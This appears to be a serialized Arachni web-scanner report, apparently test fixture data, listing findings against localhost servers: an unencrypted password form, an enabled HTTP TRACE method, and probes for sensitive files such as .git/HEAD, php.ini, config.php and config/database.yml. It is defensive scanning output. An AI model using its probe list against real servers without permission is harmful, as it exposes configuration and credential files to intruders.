\n \n
\n\n Will be ignored.\n
\n \n
\n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjY2 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0MSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Unencrypted password form description: Transmission of password does not use an encrypted channel. tags: - unencrypted - password - form cwe: '319' cwe_url: http://cwe.mitre.org/data/definitions/319.html severity: Medium remedy_guidance: Forms with sensitive content, like passwords, must be sent over HTTPS. mod_name: Unencrypted password forms variations: [] internal_modname: UnencryptedPasswordForms internal_modname: UnencryptedPasswordForms - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection var: insecure_2 url: http://localhost:11399/insecure elem: form method: GET name: Unencrypted password form description: Transmission of password does not use an encrypted channel. tags: - unencrypted - password - form cwe: '319' cwe_url: http://cwe.mitre.org/data/definitions/319.html severity: Medium remedy_guidance: Forms with sensitive content, like passwords, must be sent over HTTPS. mod_name: Unencrypted password forms variations: - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection opts: :var: !binary |- aW5zZWN1cmVfMg== :match: ! "
\n \n
" :element: form :regexp: '' var: insecure_2 url: http://localhost:11399/insecure injected: id: regexp: '' regexp_match: ! "
\n \n
" elem: form remarks: {} method: GET response: ! "
\n \n
\n\n
\n \n
\n\n Will be ignored.\n
\n \n
\n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjY2 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0MSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Unencrypted password form description: Transmission of password does not use an encrypted channel. tags: - unencrypted - password - form cwe: '319' cwe_url: http://cwe.mitre.org/data/definitions/319.html severity: Medium remedy_guidance: Forms with sensitive content, like passwords, must be sent over HTTPS. mod_name: Unencrypted password forms variations: [] internal_modname: UnencryptedPasswordForms internal_modname: UnencryptedPasswordForms - !ruby/object:Arachni::Issue verification: false references: CAPEC: http://capec.mitre.org/data/definitions/107.html OWASP: http://www.owasp.org/index.php/Cross_Site_Tracing var: url: http://localhost:8905/ elem: server method: TRACE name: HTTP TRACE description: ! "The HTTP TRACE method is enabled.\n This misconfiguration can become a pivoting point for a Cross-Site Scripting (XSS) attack." tags: - xst - methods - trace - server cwe: '693' cwe_url: http://cwe.mitre.org/data/definitions/693.html severity: Medium remedy_guidance: Disable the TRACE method if not required or use input/output validation. 
mod_name: XST variations: - !ruby/object:Arachni::Issue verification: false references: CAPEC: http://capec.mitre.org/data/definitions/107.html OWASP: http://www.owasp.org/index.php/Cross_Site_Tracing opts: :element: server :regexp: '' var: url: http://localhost:8905/ injected: id: regexp: '' regexp_match: elem: server remarks: {} method: TRACE response: TRACE / HTTP/1.1 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0OCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: HTTP TRACE description: ! "The HTTP TRACE method is enabled.\n This misconfiguration can become a pivoting point for a Cross-Site Scripting (XSS) attack." tags: - xst - methods - trace - server cwe: '693' cwe_url: http://cwe.mitre.org/data/definitions/693.html severity: Medium remedy_guidance: Disable the TRACE method if not required or use input/output validation. mod_name: XST variations: [] internal_modname: XST internal_modname: XST - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/CVS/Root elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/CVS/Root injected: Root id: Root elem: path remarks: {} method: '' response: CVS/Root headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/sitemap.xml.gz elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/sitemap.xml.gz injected: sitemap.xml.gz id: sitemap.xml.gz elem: path remarks: {} method: '' response: sitemap.xml.gz headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/phpinfo.php elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/phpinfo.php injected: phpinfo.php id: phpinfo.php elem: path remarks: {} method: '' response: phpinfo.php headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/CVS/Repository elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/CVS/Repository injected: Repository id: Repository elem: path remarks: {} method: '' response: CVS/Repository headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/CVS/Entries elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/CVS/Entries injected: Entries id: Entries elem: path remarks: {} method: '' response: CVS/Entries headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/.git/HEAD elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/.git/HEAD injected: HEAD id: HEAD elem: path remarks: {} method: '' response: .git/HEAD headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/robots.txt elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/robots.txt injected: robots.txt id: robots.txt elem: path remarks: {} method: '' response: robots.txt headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/sitemap.xml elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/sitemap.xml injected: sitemap.xml id: sitemap.xml elem: path remarks: {} method: '' response: sitemap.xml headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/_mmServerScripts/MMHTTPDB.asp elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/_mmServerScripts/MMHTTPDB.asp injected: MMHTTPDB.asp id: MMHTTPDB.asp elem: path remarks: {} method: '' response: _mmServerScripts/MMHTTPDB.asp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mjk= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/_mmServerScripts/MMHTTPDB.php elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/_mmServerScripts/MMHTTPDB.php injected: MMHTTPDB.php id: MMHTTPDB.php elem: path remarks: :stuff: - Blah - Blah2 method: '' response: _mmServerScripts/MMHTTPDB.php headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mjk= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/install.php elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/install.php injected: install.php id: install.php elem: path remarks: {} method: '' response: install.php headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: true references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/php.ini elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: true references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/php.ini injected: php.ini id: php.ini elem: path remarks: {} method: '' response: php.ini headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/config.php elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/config.php injected: config.php id: config.php elem: path remarks: {} method: '' response: config.php headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/_mmDBScripts/MMHTTPDB.asp elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/_mmDBScripts/MMHTTPDB.asp injected: MMHTTPDB.asp id: MMHTTPDB.asp elem: path remarks: {} method: '' response: _mmDBScripts/MMHTTPDB.asp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjU= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/config/database.yml elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
